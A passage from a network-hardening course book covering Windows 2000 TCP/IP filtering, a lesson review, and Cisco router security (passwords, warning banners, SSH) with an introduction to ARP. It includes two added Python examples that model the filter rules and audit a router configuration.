7. Permit only the following TCP ports: 20, 21, 23, 25, 80, 110, and 443.

8. Permit only the following protocols: 6 and 17.

9. Click OK to implement your filtering.

10. Click OK to close the Advanced TCP/IP Properties.

11. Click OK twice to close the TCP/IP and Interface Properties.

12. When you are prompted to restart the server, click No. To fully implement your changes, you would have to restart the server; however, for the purposes of this class, we need to have all ports and protocols available.

13. Go back and revert to the unfiltered settings to allow for the remainder of the tasks to function with no restrictions.

14. This time, restart your computer when you are prompted to. Then, log on as the renamed Administrator account and verify that the TCP/IP settings are correct.

15. Close all open windows.
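The filtering rules described in the TCP/IP Filtering section above, as an added Python model (example code, not part of the course): given an interface's filter settings and an inbound packet, it returns the decision the text implies, including the inbound-only rule, the "empty allow-list blocks the whole protocol" trick, and the ICMP exception. The filter objects, including one built from the TASK 4G-13 settings, and the packets are constructed for the example.

```python
"""Model of the Windows 2000 TCP/IP Filtering decision described above.

Added example (not from the course book). It applies the rules the text
states: the filter only examines unsolicited inbound traffic, each of the
TCP port, UDP port and IP protocol lists is either "Permit All" or an
allow-list, an empty allow-list blocks that whole protocol, and ICMP
(IP protocol 1) cannot be blocked even when it is left out of the list.
"""
from dataclasses import dataclass
from typing import Optional, FrozenSet

ICMP, TCP, UDP = 1, 6, 17   # IP protocol numbers used in the text

PERMIT_ALL = None   # the "Permit All" choice for a list


@dataclass(frozen=True)
class TcpIpFilter:
    """One interface's filter. None means Permit All; a set is an allow-list."""
    enabled: bool = True
    tcp_ports: Optional[FrozenSet[int]] = PERMIT_ALL
    udp_ports: Optional[FrozenSet[int]] = PERMIT_ALL
    protocols: Optional[FrozenSet[int]] = PERMIT_ALL


@dataclass(frozen=True)
class InboundPacket:
    protocol: int
    dst_port: Optional[int] = None          # only meaningful for TCP and UDP
    reply_to_local_request: bool = False    # response to a request this host made


def _allowed(allow_list, value):
    return allow_list is PERMIT_ALL or value in allow_list


def is_permitted(flt: TcpIpFilter, pkt: InboundPacket) -> bool:
    """Return True if the filter lets the inbound packet through to the host."""
    if not flt.enabled:
        return True
    # Responses to requests the host itself initiated are never filtered,
    # which is why the text says no high ports need to be opened.
    if pkt.reply_to_local_request:
        return True
    # ICMP cannot be blocked by TCP/IP Filtering, even if protocol 1 is
    # excluded from the allowed protocol list.
    if pkt.protocol == ICMP:
        return True
    # Whole-protocol check first (e.g. protocols 6 and 17 in TASK 4G-13).
    if not _allowed(flt.protocols, pkt.protocol):
        return False
    # Then the per-port lists; an empty allow-list means nothing is allowed.
    if pkt.protocol == TCP:
        return _allowed(flt.tcp_ports, pkt.dst_port)
    if pkt.protocol == UDP:
        return _allowed(flt.udp_ports, pkt.dst_port)
    return True   # other protocols are only subject to the protocol list


# The filter configured in TASK 4G-13: the listed TCP ports, all UDP ports,
# IP protocols 6 and 17 only.
TASK_4G13_FILTER = TcpIpFilter(
    enabled=True,
    tcp_ports=frozenset({20, 21, 23, 25, 80, 110, 443}),
    udp_ports=PERMIT_ALL,
    protocols=frozenset({TCP, UDP}),
)

# The "block all TCP" trick from the text: filter TCP ports with an empty list.
BLOCK_ALL_TCP = TcpIpFilter(tcp_ports=frozenset())


def check_inbound(flt, protocol, dst_port=None, reply=False):
    """Convenience wrapper: build the packet and ask the filter."""
    return is_permitted(flt, InboundPacket(protocol, dst_port, reply))


if __name__ == "__main__":
    f = TASK_4G13_FILTER
    print("inbound TCP/80 (web)           :", check_inbound(f, TCP, 80))
    print("inbound TCP/139 (NetBIOS)      :", check_inbound(f, TCP, 139))
    print("inbound UDP/53 (Permit All UDP):", check_inbound(f, UDP, 53))
    print("inbound protocol 47 (GRE)      :", check_inbound(f, 47))
    print("inbound ICMP (cannot be blocked):", check_inbound(f, ICMP))
    print("reply to our own TCP request   :", check_inbound(f, TCP, 34567, reply=True))
```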

Summary

In this lesson, you were introduced to the fundamental issues of securing Windows 2000 computers and resources. You configured GPOs for the security of the infrastructure, described the process of local logon on Windows 2000, and implemented security tools, including secedit.exe and the Security Configuration And Analysis Snap-in. You then configured logging options, focusing on the Security Log, and implemented local encryption by using EFS. Finally, you examined methods of securing network communications and how to harden the TCP/IP stack in Windows 2000.

Lesson Review

4A What are the new components of Windows networking that are introduced with Windows 2000?

Answers will vary; however, some of the components are: Active Directory, trees, forests, Organizational Units, and Group Policy Objects.

Place the following GPOs in the order that they are processed.
2 Site
1 Local
4 OU
3 Domain

4B What are some of the authentication methods Windows 2000 supports?

Kerberos, NTLM, RADIUS, SSL, and Smart Cards.

What is the name of the component of the Windows 2000 architecture that makes the method of authentication transparent to an application developer?

Security Support Provider Interface (SSPI).

In Kerberos, you can implement Single Sign On (SSO) so that a user needs to enter their logon credentials only once to access all network services.

4C What are the three tools introduced in this topic for managing the security of the Windows 2000 network?

The secedit.exe tool, security templates, and the Security Configuration And Analysis Snap-in.

What are the four basic levels for security templates?

Basic, compatible, secure, and highly secure.

If you want to secure an IIS 5.0 server, which template should you implement?

The hisecweb.inf template.

4D What are the three file systems discussed in this topic that are supported by Windows 2000?

FAT, FAT32, and NTFS.

How can you prevent subfolders from inheriting permissions from their parent folders?

Have the parent security permissions applied To This Folder Only.

What are the three levels of permission that can be granted to secure printers?

Print, Manage Printers, and Manage Documents.

4E What command would you use to have an audit policy take effect immediately on the local machine?

The secedit /refreshpolicy machine_policy command.

What is the Event ID of a successful network logon event?

540.

What is the Logon Type of an Interactive Logon?

Logon Type 2.

4F In EFS, what is used to perform the encryption?

The File Encryption Key (FEK).

What is the encryption algorithm used by EFS?

DES.

Do users require an Administrator to enable EFS on their systems?

No, EFS is enabled by default, and a user can implement it without the Administrator being involved, unless there is a policy implemented that prevents it from being used.

4G Which hive will you use if you want to make changes to the TCP/IP stack operation in a Windows 2000 computer?

HKEY_LOCAL_MACHINE.

How can you configure TCP/IP filtering on a Windows 2000 Server to filter outbound access?

You cannot. TCP/IP filtering in Windows 2000 is designed to filter inbound access only.

LESSON 5

Routers and Access Control Lists

Data Files
ping-arp-mac.cap
rip update.cap
ripv2withAuthentication.cap

Lesson Time
6 hours

Overview

In this lesson, you will be introduced to the functioning of routers and routing protocols. The examples in this lesson are shown on Cisco Routers, specifically the 2500 series. You will examine the issues of securing routers and routing protocols. You will remove unneeded services and create access control lists to manage and secure the network. The lesson ends with the creation of logging options on the Cisco router.

Objectives

In this lesson, you will:

5A Configure fundamental router security.
You will create the required configurations to secure connections, create banners, and implement SSH.

5B Examine principles of routing.
You will capture routing protocols and analyze the IP and MAC relationship in a routed environment.

5C Configure the removal of services and protocols.
You will create the required configurations to harden the core services and protocols on a Cisco router.

5D Examine the function of Access Control Lists on a Cisco router.
You will create wildcard masks to be used in conjunction with the implementation of Access Control Lists.

5E Implement Cisco Access Control Lists.
You will create the required configurations to implement Access Control Lists to defend against network attacks on a Cisco router.

5F Configure logging on a Cisco router.
You will create the required configurations to enable logging on a Cisco router.

Topic 5A

Fundamental Cisco Security

Although this lesson is not designed to make you a Cisco or a routing expert, you will become familiar with the core functions of routers and how to best harden this critical component of the infrastructure.

Cisco Router Language

A Cisco router has one or more connections to networks. Each of these connections is referred to as an interface. To further define this interface concept, Cisco uses the type of interface as part of the name as well. Therefore:

An interface that is connected to an Ethernet segment of the network always starts with an E.

A Fast Ethernet interface always starts with an F.

An interface that is connected to a serial connection always starts with an S.

An interface that is connected to a Token Ring segment always starts with To.

Along with the interface type, Cisco routers are numbered. The interface numbering begins with a zero. In other words:

The first Ethernet interface on the router is known as E0.

Likewise, the first serial interface on the router is S0.

Finally, the first Token Ring interface on the router is To0.

Cisco Operating System

The Cisco routers do have their own operating system, which is known as the IOS (Internetworking Operating System). The IOS is found on all Cisco routers and can be uploaded to or downloaded from a tftp site. It is common to copy the IOS image to the tftp location as a quick backup in the event that the running IOS gets corrupted.

Most of the current routers in production are running versions 11.x or 12.x of the Cisco IOS. When Cisco makes a major release of the IOS, it is assigned a number, such as 11 or 12. Major releases can also be added to the numbers, such as 11.2 or 12.2. You might also see an IOS listed as version 12.0(3). The 3 in parentheses is the third maintenance revision of the major release. Maintenance revisions are released every eight weeks and contain bug fixes and/or updates, as Cisco dictates.

bug: An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction.

Accessing the Router

Cisco provides a wide variety of access points for their routers. Each method of access can provide the ability to view the router differently. Some methods require the network to be functioning and active, while others do not require any network connectivity at all. The methods of access include the console port, the auxiliary port, or network access. Network access can, in turn, include VTY (terminal access), HTTP, TFTP, and SNMP. Each of these methods is detailed here:

The console port is the main point of access on a Cisco router. This is a direct physical connection, requiring the router to be in the presence of the person using the port. This is the connection method used to create the initial configuration and in the event of an emergency, such as password recovery. Because it has direct physical access, the console port should not be the primary method of accessing the router.

The auxiliary port can be used to connect to the router via a modem. This can be a functional method of accessing the router if the primary network is down and you are not able to gain physical access to the router.

The VTY sessions provide for terminal access to the router. These connections require the network to be functioning to provide access. The most common method of accessing a VTY session is telnet, although, for security purposes, SSH is supported and is recommended. There are five VTY ports on the router by default, and they are numbered 0 through 4. In this course, access will be provided by using VTY sessions.

Other network access points like HTTP, TFTP, and SNMP are also supported on newer versions of the IOS. HTTP can be used if the router runs as a Web server, authenticating users for access. TFTP is used for loading IOS and configuration files, and SNMP can be used in full network management configurations.

SNMP: (Simple Network Management Protocol) Software used to control network communications devices using TCP/IP.

Operating Modes

In the router, there are several different modes an administrator can use. These range from simple, informational modes, to the complex modes of router configuration. Several examples of the different modes are listed below:

User Mode: In this mode, users can see the configuration of the router, but will not be able to make any significant changes to the router. The prompt for User Mode looks like this: Router>.

Enable Mode: In this mode, users can make more significant changes to the router, including some of the router configuration options. The prompt for Enable Mode looks like this: Router#.

Global Configuration Mode (also known as Configure Terminal Mode): In this mode, users can make configuration changes that will affect the entire router. The prompt for Global Mode looks like this: Router(config)#.

Generally, once you connect to the router, you will move to Enable Mode right away, since that is where much of the router management happens. As a side note, Enable Mode is often called Privileged Mode in text. So, you can consider Enable Mode and Privileged Mode to mean the same thing: the next level of router access beyond User Mode.

Configuration Fragments

In this lesson, you will see many examples of configurations of the router. It is not practical to list every step and every line entered for every option. Therefore, what you will see are called configuration fragments.

For example, to navigate to an Interface Mode of a router, the following commands are required:

1. Connect to the router via an access method, such as telnet: Telnet 10.10.10.10

2. Enter the password for VTY access: L3tm3!n

3. Enter the password for Enable Mode: P0w3r

4. Enter the command for Configure Terminal Mode: Configure Terminal

5. Enter the command for Interface Mode: Interface Ethernet 0

In this course, the command sequence listed previously will not be described line-by-line but with a configuration fragment. So, the steps to access Interface Mode will look like this:

1. Router#Config Terminal

2. Router(Config)#Interface Ethernet0

This configuration fragment goes right to the concept, or function, of the discussion. In this example, you cannot be in Enable Mode (identified by the Router# prompt) without first accessing the router (probably by using Telnet) and entering the required credentials.

Navigating in the Router

The Cisco router interface is a command-line interface, with a format that is similar to UNIX. For those of you getting started with the router, if you get lost in the command structure, here are some of the more common commands to learn and use. First is the question mark (?).

This simple single-character command will list for you all the available options at a given point in the router. For example, if you enter the question mark at the User Mode prompt, like so: Router>?, you will be given an alphabetical list of the commands that are options at this point. This command will yield a different set of commands than using the same question mark at the Enable Mode prompt (Router#?).

If you recall the first letter of a command, but not the entire string, again the question mark can come in handy. For example, if you are trying to enter Enable Mode, but forgot how to spell enable, you can use the following command: Router>E? This command lists all the commands starting with the letter E with brief descriptions of their functions.

Other shortcuts to use are the Up Arrow and Down Arrow keys. Using these will scroll you through commands you have entered into the router for quick access. Finally, using key combinations can be helpful as well. Two examples of key combinations are Ctrl+A and Ctrl+E. Using the Ctrl+A key combination moves the cursor to the beginning of a command line. Using the Ctrl+E key combination moves the cursor to the end of a command line.

As an FYI, if the Up Arrow and Down Arrow keys do not function on your system, you can use the key combination Ctrl+P in place of the Up Arrow key, and Ctrl+N in place of the Down Arrow key.
Authentication and Authorization

In order for someone to have access to control a router, there must be both authentication and authorization. It is important not to confuse these two, as they are so similar. Authentication is the process of identifying a user, generally granting or denying access. Authorization is the process of defining what a user can do, or is authorized to do. So, a user gains access to the router via authentication and gains control of the router via authorization.

In Cisco routers, there are two main categories of authentication: the AAA method and the non-AAA method (called traditional by some). AAA stands for Authentication, Authorization, and Accounting. Earlier, you were introduced to the methods of access, such as console, auxiliary, and VTY sessions. These are considered non-AAA access methods. Another non-AAA access method is called Terminal Access Controller Access Control System, or TACACS for short. These non-AAA methods use a local username and password for authentication.

AAA methods include RADIUS and Kerberos. These methods provide the full level of Authentication, Authorization, and Accounting that AAA access methods require.

Configuring Access Passwords

Because there are several different methods of accessing the router, you must be able to lock down each of these access points in order to provide security. The first line of defense is to provide a password for each of these forms of access.

Setting the Console Password

Because the console-port connection is used for direct access, it must have a strong password. This can be, and usually is, created during the initial setup of the router. In order to set the Console password, you will need to enter Configure Terminal Mode, and then enter the command line console 0. This is what gets you into the mode where the password can be created. The login command tells the router that a password is required, and the password command is used to enter the actual password. The configuration fragment looks like this:

Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

Setting the VTY Password

Configuration of the password for the VTY sessions is similar to creating the Console password. Remember that there are five VTY sessions, numbered 0 through 4. When you are setting the VTY password, you can create a password for one or for all of these sessions. In this first configuration fragment, the password is set for just the first VTY session:

Router#config terminal
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

In the following configuration fragment, the password is set for all VTY sessions, 0 through 4. Note that the process is nearly identical.

Router#config terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

Setting the Enable Passwords

The process for setting the Enable password is similar to the process for setting the Console password. You will notice that the processes in the following sections are all similar; only the object (such as the console or vty) differs.

As to the password itself, there are two different Enable passwords. The first is the standard Enable password; the second is the Enable Secret password. The standard Enable password is used only for backwards compatibility. If the Enable Secret password has been configured, it takes precedence. The reason the Enable Secret password is used over the standard Enable password is that the Enable Secret password is encrypted and cannot be read in plaintext in the router. The configuration fragment for setting the Enable Secret password looks like this:

Router#config terminal
Router(config)#enable secret p@55w0rd
Router(config)#^Z
Router#

Lesson 5: Routers and Access Control Lists
Hardening The Infrastructure (SCP)

TASK 5A-1
Configuring Passwords
1. Create the configuration fragment that you would use to set the Console password of ACC3$$, and to set all VTY sessions to use the password of +3ln3+.

Router#configure terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password ACC3$$
Router(config-line)#^Z
Router#
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password +3ln3+
Router(config-line)#^Z
Router#

Creating User Accounts

Although individual user accounts are not required for regular operation of the router, adding them allows another level of control over the router and over router access.

To create local user accounts, the command syntax is only one line. In organizations where multiple people manage the router, this is a solid practice. The following configuration fragment shows the creation of several user accounts:

Router#configure terminal
Router(config)#username Auser password u$3r1
Router(config)#username Buser password u$3r2
Router(config)#username Cuser password u$3r3
Router(config)#username Duser password u$3r4
Router(config)#^Z
Router#

Implementing Banners

In addition to having proper passwords on the router, it is important to have adequate warning banners. It is highly recommended that you view these banners as warning banners and not as welcome banners, as they used to be called. A warning banner is not designed to be the end-all of security; most people know a banner will not stop a determined attacker. However, a banner can provide some legal backing for you and your organization.

There are four general functions that warning banners should provide. Although you should look to professional legal counsel for the exact wording, your banner should address each of these. The banner should:
- Not provide useful technical or non-technical information that an attacker can use.
- Define who is and who is not an authorized user of the system(s).
- Provide adequate legal standing to both prosecute offenders and protect the administrators of the equipment.
- Inform users of the system(s) that their actions are subject to recording, and may be used in a court of law.

The following is an example of what a banner could look like for an organization:

Warning!!! This system is designed solely for the authorized users of Company X on official business. Users of this system understand that there is no expectation of privacy, and that use of the system may be monitored and recorded. Use of this system is consent to said monitoring and recording. Users of this system acknowledge that if monitoring finds evidence of misuse, abuse, and/or criminal activity, that system operators may provide monitoring and recording data to law enforcement officials.

Implementing Cisco Banners

On the Cisco router, there are several types of banners available:

MOTD banner: The MOTD banner is for setting Messages Of The Day. This is not an efficient location for the default warning banner, because the MOTD banner is something that literally can change with each day. You do not want to be setting the warning banner each and every day and worrying about missing a day. This banner is used for sending notices to users, such as an upcoming system shutdown for upgrading the IOS.

Login banner: The login banner is where the warning banner should be located. This banner will be shown to each user every time a login attempt happens. The banner is set in Configure Terminal Mode, and uses a beginning and ending delimiter character. The delimiter can cause confusion, but is quite simple: any character can be used as a delimiter, as long as you use the same character at the beginning and the end. In the following configuration fragment, the letter C is used as the delimiter character:

Router#configure terminal
Router(config)#banner login C
Warning!!! This system is designed solely for the authorized users of Company X on official business. Users of this system understand that there is no expectation of privacy, and that use of the system may be monitored and recorded. Use of this system is consent to said monitoring and recording. Users of this system acknowledge that if monitoring finds evidence of misuse, abuse, and/or criminal activity, that system operators may provide monitoring and recording data to law enforcement officials.
C
Router(config)#^Z
Router#

EXEC banner: The EXEC banner is used for setting a message for users who enter EXEC, or Privileged, Mode. You can create a new banner, use the same warning banner, or whatever else you wish. The process for setting a new banner is nearly identical to the process for the login banner; the difference is in the command. Instead of the command banner login, you use the command banner exec. In the following configuration fragment, you can see the exec banner created with a delimiter of the pound sign (#):

Router#configure terminal
Router(config)#banner exec #
Reminder!!! When you logged into this system, you acknowledged that you are an authorized user of Company X systems. You also acknowledged that your use of this system may be monitored and recorded. Finally, you agreed that if misuse, abuse, and/or criminal activity are found while monitoring, that law enforcement officials may be contacted.
#
Router(config)#^Z
Router#

TASK 5A-2
Configuring Login Banners
1. Create the configuration fragment that you would use to create a login warning banner. You can include whatever text you like for the banner, but use the letter B as your delimiter.

A possible response is:

Router#configure terminal
Router(config)#banner login B
Warning!!! This is the login banner for the SCNP HTI class. If you are not a member of this class, you may not access this system. Users of this system are advised that nearly everyone is running packet-capturing utilities and everyone is watching you!
B
Router(config)#^Z
Router#

SSH Overview

Although Telnet is used in this course, and is often the method of choice for many administrators, from a security perspective it is not a solid option. This is because there is no encryption on the session: all commands and responses are cleartext and can be viewed by any packet-capture utility. SSH, or Secure Shell, provides a higher level of security on remote connections to the router. Using RSA public key cryptography, SSH establishes a secure channel of communication between client and server.

Not all versions of the IOS support SSH. Versions that support IPSec also support SSH.

Cisco IOS support for SSH is not present in older versions of the IOS, such as 11.2 and 11.3. After version 12.0(5) with IPSec, support for SSH was included, and only IOS versions that have IPSec will have SSH support. In order for SSH sessions to be established, some preparation must take place on the router. The router must have usernames defined, must have a hostname defined, and must have a domain name set.

Router Configuration to use SSH

In implementing SSH, you should use Access Control Lists to control VTY access. A later section fully details Access Control Lists (ACLs). In brief, an ACL is used to regulate access (denial or permission) to an object on the router.

In this configuration fragment, ACL 23 is used to define the host that is allowed to access the router for administration. The host name of the router is simply Router, and the domain will be scp.mil. The username is SSHUser, and the password for this user is No+3ln3+.

Router#configure terminal
Router(config)#ip domain-name scp.mil
Router(config)#access-list 23 permit 192.168.51.45
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#username SSHUser password No+3ln3+
Router(config)#line vty 0 4
Router(config-line)#login local
Router(config-line)#exit
Router(config)#

The router configuration is close to being finished, but there is still some work to be done. RSA must be enabled so that the key pair can be generated and used. When creating a new key pair, be aware that it may take some time for the pair to complete. In this fragment, all you will see is the command for creating the key pair, crypto key generate rsa, the use of 1024 as the number of bits (the Cisco recommended minimum), and the OK when the calculation is done.

Router#configure terminal
Router(config)#crypto key generate rsa
The name for the keys will be: Router.scp.mil
Choose the size of the key modulus in the range of 360 to 2048 for your
  General Purpose Keys. Choosing a key modulus greater than 512 may take
  a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys ...
[OK]
Router(config)#

You have now enabled SSH to run on your router. There are some commands that you can use to fine-tune the SSH function, and you will need to configure your client to use SSH. The following configuration fragment is used to define the timeout, in seconds, that the server will wait for the client to provide a password. The default is 120 seconds, and the Cisco recommended time is 90 seconds. In this fragment, the time has been changed to 45 seconds.

Router#configure terminal
Router(config)#ip ssh time-out 45
Router(config)#^Z
Router#

The next fragment is used to define the number of retries that will be allowed before the router drops the connection. The default for this setting is 3, and the maximum is 5. This is a setting that you may rarely change, but in the fragment, the retries are set to 2, so after the second bad try, the connection is dropped:

Router#configure terminal
Router(config)#ip ssh authentication-retries 2
Router(config)#^Z
Router#

Finally, the following configuration lets the VTY sessions on the router accept both SSH and Telnet as valid connection types. If you want only SSH to be used, which is the point here, you would not add the word telnet to the command.

Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#transport input ssh telnet
Router(config-line)#^Z
Router#

SSH Verification

On the router, you will want to run some diagnostic commands to find out who is connected and how. These commands will show you the state of your SSH connections. There are some differences based on the IOS version you are running, so note that in the following.

If you are running IOS version 12.1, and you want to see the state of SSH connections, including who is connected, use the command show ip ssh. The following fragment lists what this command will reveal.

Router#show ip ssh
Connection   Version   Encryption   State   Username
0            1.5       3DES         4       SSHUser
Router#

If you are running IOS version 12.2, there are two commands for viewing SSH information. First is the show ip ssh command, only here it lists the details, such as timeout and version. The second command is show ssh, and this shows the user connected. The following fragment shows both commands used, one after the other, and their result onscreen.

Router#show ip ssh
SSH Enabled - version 1.5
Authentication timeout: 45 secs; Authentication retries: 2
Router#show ssh
Connection   Version   Encryption   State             Username
0            1.5       3DES         Session Started   SSHUser
Router#

INSTRUCTOR TASK 5A-3
Configuring SSH on a Router
Setup: Observe as your instructor performs the SSH configuration on the LEFT and RIGHT routers.
1. Console in to the LEFT router, and switch to EXEC mode.
2. At the LEFT# prompt, enter conf t to switch to config mode. The LEFT(config)# prompt should be displayed.
3. Enter ip domain-name left.com to provide a domain name.
4. Enter crypto key generate rsa to create key pairs. When you are prompted for the number of bits in the modulus, press Enter to accept the default of 512.
5. Enter ip ssh time-out 120 to set the timeout value to 2 minutes.
6. Enter ip ssh authentication-retries 3 to limit the number of unsuccessful attempts.
7. Enter line vty 0 4 to begin the line configuration. The LEFT(config-line)# prompt is displayed.
8. Enter transport input ssh to limit the VTY sessions to accept only SSH connections.
9. Enter login local to provide for local login.
10. Enter exit to return to the LEFT(config)# prompt.
11. Enter username sshl01 privilege 15 password sshpass to assign a user name and password for student station L01. Repeat this command to assign user names and passwords for all other student stations on the left side of the classroom.
12. Enter exit to return to the LEFT# prompt.
13. Enter copy ru st to save the configuration changes. Press Enter to accept the default file name.
14. Enter exit to return to the LEFT> prompt.
15. Disconnect from the LEFT router, and console in to the RIGHT router.
16. Use the steps listed previously as a guide to set up SSH on the RIGHT router. Use the domain name right.com, and create user names such as sshr01, sshr02, and so forth.
17. Disconnect from the RIGHT router, and close the console.
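The checks from the Configuring Access Passwords, Implementing Banners and Router Configuration to use SSH sections, gathered into one audit that runs over a saved IOS configuration. This is an added example and not part of the course; the two configurations it inspects are constructed for the illustration (the weak one has no enable secret or login banner and leaves telnet in transport input), and the assumption that an absent transport input leaves Telnet open is flagged in the code.

```python
"""Audit a saved IOS configuration for the access-control settings this lesson covers.

Added example, not part of the course: it checks for an enable secret, login and
password on console and VTY lines, Telnet left in 'transport input', an access-class
on the VTYs, plaintext line passwords, and the presence of a login banner.
"""

# Constructed sample showing the weak settings the lesson warns about. The banner is
# kept on one line so the minimal parser below needs no multi-line handling.
WEAK_CONFIG = """\
hostname Router
ip domain-name scp.mil
enable password cisco
username SSHUser password No+3ln3+
access-list 23 permit 192.168.51.45
banner motd ^C Router reboots for an IOS upgrade tonight ^C
line con 0
 login
 password l3tm3!n
line vty 0 4
 access-class 23 in
 login local
 transport input ssh telnet
"""

# The same router after applying the lesson's recommendations.
HARDENED_CONFIG = """\
hostname Router
ip domain-name scp.mil
service password-encryption
enable secret p@55w0rd
username SSHUser password No+3ln3+
access-list 23 permit 192.168.51.45
banner login ^C Warning!!! Authorized users of Company X only. ^C
line con 0
 login
 password l3tm3!n
line vty 0 4
 access-class 23 in
 login local
 transport input ssh
"""


def parse_config(config):
    """Split a config into top-level commands and the sub-commands of each 'line' block."""
    top, lines, current = [], {}, None
    for raw in config.splitlines():
        if not raw.strip():
            continue
        if raw.startswith(" ") and current is not None:
            lines[current].append(raw.strip())
            continue
        cmd = raw.strip()
        top.append(cmd)
        current = cmd if cmd.startswith("line ") else None
        if current is not None:
            lines[current] = []
    return top, lines


def audit(config):
    """Return a list of findings; an empty list means every check passed."""
    top, lines = parse_config(config)
    findings = []
    if not any(c.startswith("enable secret ") for c in top):
        findings.append("global: no 'enable secret'; privileged mode relies on the legacy "
                        "'enable password', which is stored in plaintext or a reversible encoding")
    elif any(c.startswith("enable password ") for c in top):
        findings.append("global: legacy 'enable password' still set alongside 'enable secret'; remove it")
    if not any(c.startswith("banner login ") for c in top):
        findings.append("global: no 'banner login'; the warning banner belongs on the login banner, not the MOTD")
    uses_line_pw = any(c.startswith("password ") for cmds in lines.values() for c in cmds)
    if uses_line_pw and "service password-encryption" not in top:
        findings.append("global: line passwords are stored in plaintext; add 'service password-encryption'")
    for name, cmds in lines.items():
        has_login = any(c == "login" or c.startswith("login ") for c in cmds)
        has_pw = any(c.startswith("password ") for c in cmds)
        if not has_login:
            findings.append(f"{name}: no 'login'; nobody is asked for credentials")
        elif "login" in cmds and not has_pw:
            findings.append(f"{name}: 'login' set but no 'password'; IOS refuses the line")
        if name.startswith("line vty"):
            transport = next((c for c in cmds if c.startswith("transport input ")), None)
            # Assumption: with no 'transport input' the line is treated as open to Telnet;
            # the real default depends on the IOS release.
            allowed = transport.split()[2:] if transport else ["all"]
            if "telnet" in allowed or "all" in allowed:
                findings.append(f"{name}: Telnet accepted ({transport or 'none set'}); use 'transport input ssh'")
            if not any(c.startswith("access-class ") for c in cmds):
                findings.append(f"{name}: no 'access-class'; any source can reach the VTYs")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{label}: {len(audit(cfg))} finding(s)")
        for finding in audit(cfg):
            print("  -", finding)
```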

18. Try to Telnet to either of the ssh-enabled routers, and ask students to do the same. None of the attempts should be successful, as you have blocked Telnet connections on both routers.

Client Configuration to use SSH

Just as there was some configuration required on the server, some configuration is needed on the client side to run SSH. However, the configuration on the client is not nearly as complex. In general, a client SSH application must be installed, and the client must be configured to use the application in communication with the router. There are several SSH client programs available, and in this example, the PuTTY program is used. Figure 5-1 shows an example of the settings for this application.

Figure 5-1: The client configuration for an SSH session.

During the configuration, you will be asked to provide input on the cryptography used, and you will select RSA. Additionally, you will be required to present proper credentials when connecting, meaning the local username on the router and the password. Once you enter the proper credentials, you will have secure access, and operation will be no different than using Telnet.

TASK 5A-4
Configuring the SSH Client
Setup: You are logged on to Windows 2000 Server as the renamed Administrator account. The routers have a limited number of simultaneous logins, so you might need to take turns accessing the routers if your class has many students in it.
Provide students with the location of the PuTTY installation program.
1. Copy the file putty.exe from the location provided by your instructor to your boot partition. The PuTTY program is a popular freeware package.
2. Double-click putty.exe.
Provide students with the IP addresses for the LEFT and RIGHT routers.
3. For Host Name, enter the IP address for your router. Your instructor will provide the router IP addresses. The router you use is named LEFT or RIGHT, based on your location in the classroom.
4. Click SSH (Port 22).
5. Click Open to initiate the connection.
6. When you are prompted, click Yes to accept the key, and click Yes to continue the connection. Press Enter to display the login prompt.
7. Enter your ssh user name, such as sshl01. You should be prompted for a password.
8. Enter sshpass to complete the login sequence.
9. After authentication has taken place, log out and close PuTTY.

Topic 5B
Routing Principles

To be able to secure your routers and routed networks, you need to understand some basic principles related to routing in general. Let's begin by looking at how routers and routing fit into the OSI Model.

The ARP Process

Most people are aware that routers function at the Network layer, but that statement must be understood to mean that routers route at the Network layer. Routers are affected by and operate at other layers as well, including the Data Link layer. The OSI model is the foundation of all network communication. Routers fit into the OSI model just as other devices do, with their primary functionality being at the Network layer. In this lesson, the vast majority of the content will focus on the Network layer; however, there are important areas of the Data Link layer that must be investigated as well.

Layer Two addresses are used to get data packets from one local node to another local node, while Layer Three addresses are used to get data packets from one network to another network.

MAC addresses are split into two parts, each containing six hexadecimal digits. The first six digits represent the vendor code (manufacturer indicator) or OUI (Organizationally Unique Identifier), and the second six are left for definition by the vendor and are often used as a serial number. These 48-bit numbers are designed to be globally unique, meaning that there is only one NIC with a given MAC address on the entire planet.

The IEEE (Institute of Electrical and Electronics Engineers) issues MAC addresses to network hardware vendors to ensure that MAC addresses remain unique.

ARP (RFC 826) is used to make the connection between the Layer Two and Layer Three addresses. ARP is used in the following examples of data moving from one host to another. The first example shows data moving from Node 1 to Node 2 on a local network segment. In order for the data to arrive properly, the following steps must occur:
1. Node 1 (knowing the Network layer address of Node 2) sends a local broadcast on the LAN indicating that Node 1 wishes to learn the Data Link address for Node 2.
2. Since Node 1 sent a broadcast, all nodes on the local segment receive and process the request, discarding it when they identify that the broadcast was not intended for them.
3. Node 2 identifies the message requesting its MAC address and responds by sending its Data Link address. Node 2 also stores the MAC address of Node 1 for future use.
4. Node 1 sends the packet directly to the Data Link address of Node 2.

Figure 5-2 shows this process between Node 1 and Node 2 on the same segment.

Local ARP Broadcast Between Two Nodes
Figure 5-2: This example shows the process of a local ARP broadcast between two nodes.

To take this concept a bit further, let's look at the process of MAC address resolution if Node 2 is not on the local segment (see Figure 5-3). In order for communication to take place between Nodes 1 and 2, the following steps must occur:
1. Node 1 determines that it needs to communicate with Node 2. As with all TCP/IP communication, Node 1 ANDs its IP address with its subnet mask, then it ANDs Node 2's IP address with the Node 1 subnet mask.
2. Node 1 compares the results of the two AND processes to determine if they are the same, meaning that the nodes are on the same network, or different, meaning that the nodes are on different networks. In this example, the results are different, so Node 1 can conclude that Node 2 is situated on a different network than Node 1.
3. If Node 1's TCP/IP stack is configured with a Default Gateway, Node 1 will use ARP resolution for the Default Gateway address, as explained in the previous example (because Node 1's Default Gateway will most likely be on the same network as Node 1), and store the Default Gateway address as the address to use for reaching Node 2.

